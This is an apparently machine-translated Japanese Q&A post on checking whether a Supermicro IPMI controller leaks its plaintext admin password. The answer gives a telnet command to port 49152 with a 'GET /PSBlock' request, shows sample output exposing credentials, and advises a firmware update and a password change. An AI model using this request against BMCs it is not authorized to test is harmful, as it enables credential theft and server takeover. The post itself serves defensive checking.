Supermicro IPMIがプレーンテキストの管理者パスワードでWebを介して侵害されているかどうかを確認するにはどうすればよいですか?


10

私はいくつかのSupermicroサーバーでIPMIを実行しています。このブログ(http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras)で説明されているように、重大な脆弱性があります。リモートの場所からプレーンテキストの管理者パスワードを取得します。

サーバーのマザーボードが侵害されているかどうかを確認するにはどうすればよいですか?

回答:


13

ポート49152のIPMI IPアドレスにTelnetで接続し、特定のGET要求を実行します。危険にさらされている場合は、ユーザーとパスワードを取得する必要があります。

telnet server.example.com 49152

接続GET /PSBlockが結果を要求して監視すると、次のようになります。

Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock

回答:

=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??

この問題を解決するには、IPMIファームウェアを最新バージョンに更新します。ファームウェアはIPMIコントローラーに固有なので、SupermicroのWebサイトで仕様を取得する必要があります。

次に、ファームウェアを更新した後、パスワードを変更します

弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.